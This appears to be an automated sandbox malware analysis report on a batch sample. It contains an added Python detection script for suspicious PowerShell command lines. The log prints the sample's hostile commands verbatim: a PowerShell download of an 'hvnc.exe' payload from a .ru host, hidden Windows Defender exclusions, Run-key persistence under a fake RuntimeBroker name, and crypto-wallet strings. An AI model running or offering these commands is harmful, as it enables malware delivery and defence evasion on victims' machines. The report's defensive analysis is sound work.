            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe; Memory allocated: 2AD0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe; Memory allocated: 1AAD0000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5264
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4592
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6049
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3615
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1835
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7730
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6893
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2787
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7765
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1934
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3311
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4919
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4228
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2648
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500; Thread sleep count: 5264 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228; Thread sleep count: 4592 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848; Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072; Thread sleep count: 6049 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072; Thread sleep count: 3615 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268; Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672; Thread sleep count: 1835 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672; Thread sleep count: 7730 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448; Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2716; Thread sleep count: 6893 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072; Thread sleep count: 2787 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820; Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348; Thread sleep count: 7765 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672; Thread sleep count: 1934 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4440; Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124; Thread sleep count: 3311 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820; Thread sleep count: 4919 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676; Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072; Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768; Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020; Thread sleep count: 4228 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5396; Thread sleep count: 2648 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: RuntimeBroker.exe, 0000000B.00000002.3302940891.000000001C502000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllScrip
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match | File source: temp_script.bat, type: SAMPLE
            Source: Yara match | File source: amsi64_2284.amsi.csv, type: OTHER
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" remove-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'runtimebroker';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'runtimebroker' -value '"c:\users\user\appdata\roaming\runtimebroker.exe"' -propertytype 'string'
            Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 11.2.RuntimeBroker.exe.1c600000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty@fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus Web3@jiidiaalihmmhddjgbnbgdfflelocpak
Source: RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: RuntimeBroker.exe, 0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore

Remote Access Functionality

Source: Yara match | File source: 11.2.RuntimeBroker.exe.1c600000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RuntimeBroker.exe.1c600000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Tactic columns of the report's matrix: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. Only the cells the report flags for this sample are listed below; the digits in brackets are the badge values the report attaches to each flagged cell, reproduced as extracted. Unflagged cells of the blank matrix are omitted.

Reconnaissance: none flagged
Resource Development: Scripting [11]
Initial Access: none flagged
Execution: Windows Management Instrumentation [11]; Command and Scripting Interpreter [1]; PowerShell [2]
Persistence: Scripting [11]; DLL Side-Loading [1]; Registry Run Keys / Startup Folder [1]; Services File Permissions Weakness [1]
Privilege Escalation: DLL Side-Loading [1]; Process Injection [11]; Registry Run Keys / Startup Folder [1]; Services File Permissions Weakness [1]
Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [22]; Timestomp [1]; DLL Side-Loading [1]; Masquerading [11]; Virtualization/Sandbox Evasion [41]; Process Injection [11]; Services File Permissions Weakness [1]
Credential Access: none flagged
Discovery: System Information Discovery [13]; Security Software Discovery [211]; Process Discovery [1]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]
Lateral Movement: none flagged
Collection: Archive Collected Data [11]; Data from Local System [1]
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [3]
Exfiltration: none flagged
Impact: none flagged
Behavior Graph ID: 1488895 | Sample: temp_script.bat | Start date: 06/08/2024 | Architecture: WINDOWS | Score: 100

Start
  Domains contacted: funcaptcha.ru, strompreis.ru
  Signatures: Antivirus detection for URL or domain; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; 14 other signatures
  cmd.exe (started)
    Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell); Adds a directory exclusion to Windows Defender
    RuntimeBroker.exe (started)
      Network: strompreis.ru 45.11.229.96, ports 49705, 49712, 49714, ALPHAONE-ASUS, Germany
      Dropped: C:\Users\user\AppData\...\RuntimeBroker.exe, PE32
      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Suspicious powershell command line found; 2 other signatures
      powershell.exe (started)
        conhost.exe (started)
    powershell.exe (started)
      Signatures: Loading BitLocker PowerShell Module; Powershell drops PE file
    powershell.exe (started)
      Network: funcaptcha.ru 188.114.96.3, ports 443, 49704, CLOUDFLARENETUS, European Union
      Dropped: C:\Users\user\AppData\...\RuntimeBroker.exe, PE32
    6 other processes (started)
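The cmd.exe to powershell.exe chain in the graph (download and execution via PowerShell, a Windows Defender directory exclusion, a Run value named RuntimeBroker) is the kind of activity a process-creation or script-block log detection catches. The following Python is an added example and not code from the report or from Joe Sandbox: it decodes -EncodedCommand payloads (base64 over UTF-16LE, accepting the abbreviated switch forms PowerShell honours) and applies checks modelled on the behaviours listed here. The sample command lines are constructed for this example; only the URL https://funcaptcha.ru/hvnc.exe, the RuntimeBroker Run value and the AppData drop locations come from the report, and the rule names are this example's own.

```python
import base64
import re

# Constructed sample command lines, modelled on the behaviour this report lists
# (PowerShell download of https://funcaptcha.ru/hvnc.exe, a Defender exclusion, a Run
# value named RuntimeBroker). They are built for this example, not copied from the report.


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand form PowerShell expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


RUN_KEY_SCRIPT = (
    "New-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
    "-Name RuntimeBroker -Value C:\\Users\\user\\AppData\\Roaming\\RuntimeBroker.exe "
    "-PropertyType String"
)

SAMPLE_CMDLINES = [
    'powershell.exe -nop -w hidden -c "Add-MpPreference -ExclusionPath $env:APPDATA"',
    'powershell.exe -c "(New-Object Net.WebClient).DownloadFile(\'https://funcaptcha.ru/hvnc.exe\', \'$env:TEMP\\RuntimeBroker.exe\')"',
    "powershell.exe -NoProfile -enc " + encode_command(RUN_KEY_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -c Get-Date",  # benign control line
]

# Detection rules applied to the effective script (decoded when -EncodedCommand is used).
RULES = {
    "defender_exclusion": re.compile(
        r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)", re.I),
    "download_cradle": re.compile(
        r"\b(?:DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|iwr|"
        r"Invoke-RestMethod|irm|Start-BitsTransfer)\b", re.I),
    "run_key_persistence": re.compile(
        r"\b(?:New|Set)-ItemProperty\b.*?CurrentVersion\\Run\b", re.I),
    "exe_dropped_under_appdata": re.compile(
        r"AppData\\(?:Roaming|Local\\Temp)\\[^\s'\"]+\.exe", re.I),
    # A system binary name (RuntimeBroker.exe and friends) referenced anywhere but System32.
    "system_process_name_outside_system32": re.compile(
        r"(?<!System32)\\(?:RuntimeBroker|svchost|lsass|explorer)\.exe\b", re.I),
}


def decode_encoded_command(cmdline: str):
    """Return (script, was_encoded). Any prefix of -EncodedCommand that PowerShell
    accepts (-e, -ec, -enc, ...) is honoured; on a bad payload the raw line is returned."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        name = tok[1:].lower()
        if name == "ec" or (name and "encodedcommand".startswith(name)):
            payload = tokens[i + 1].strip("'\"")
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16-le"), True
            except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
                return cmdline, False
    return cmdline, False


def analyze_cmdline(cmdline: str) -> list:
    """Names of the rules that fire for one process-creation command line."""
    script, was_encoded = decode_encoded_command(cmdline)
    hits = ["encoded_command"] if was_encoded else []
    hits.extend(name for name, rx in RULES.items() if rx.search(script))
    return hits


def scan(cmdlines) -> dict:
    """Map each command line to its findings, keeping only lines that fired a rule."""
    results = {}
    for line in cmdlines:
        hits = analyze_cmdline(line)
        if hits:
            results[line] = hits
    return results


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES).items():
        print(hits, "<-", line[:80])
```

The decoding step matters more than the pattern list: the Sigma rule family this report cites for the MpPreference cmdlet triggers on the base64-encoded form, and a rule that only inspects the raw command line misses it. The benign control line shows the rules do not fire on -ExecutionPolicy or a plain cmdlet.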

Source | Detection | Scanner | Label
temp_script.bat | 5% | ReversingLabs |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\RuntimeBroker.exe | 100% | Avira | TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | 100% | Avira | TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Roaming\RuntimeBroker.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Roaming\RuntimeBroker.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno

No Antivirus matches

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://funcaptcha.ru/hvnc.exe | 100% | Avira URL Cloud | malware
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll | 0% | Avira URL Cloud | safe
https://stackoverflow.com/q/2152978/23354rCannot | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe | 0% | Avira URL Cloud | safe
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
funcaptcha.ru | 188.114.96.3 | true | true | | unknown
strompreis.ru | 45.11.229.96 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://funcaptcha.ru/hvnc.exe | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000C.00000002.2227962406.0000028B2B76F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2227962406.0000028B2B8A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2209055197.0000028B1D0B4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/14436606/23354 | RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000C.00000002.2209055197.0000028B1B921000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/2152978/23354rCannot | RuntimeBroker.exe, 0000000B.00000002.3294835454.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
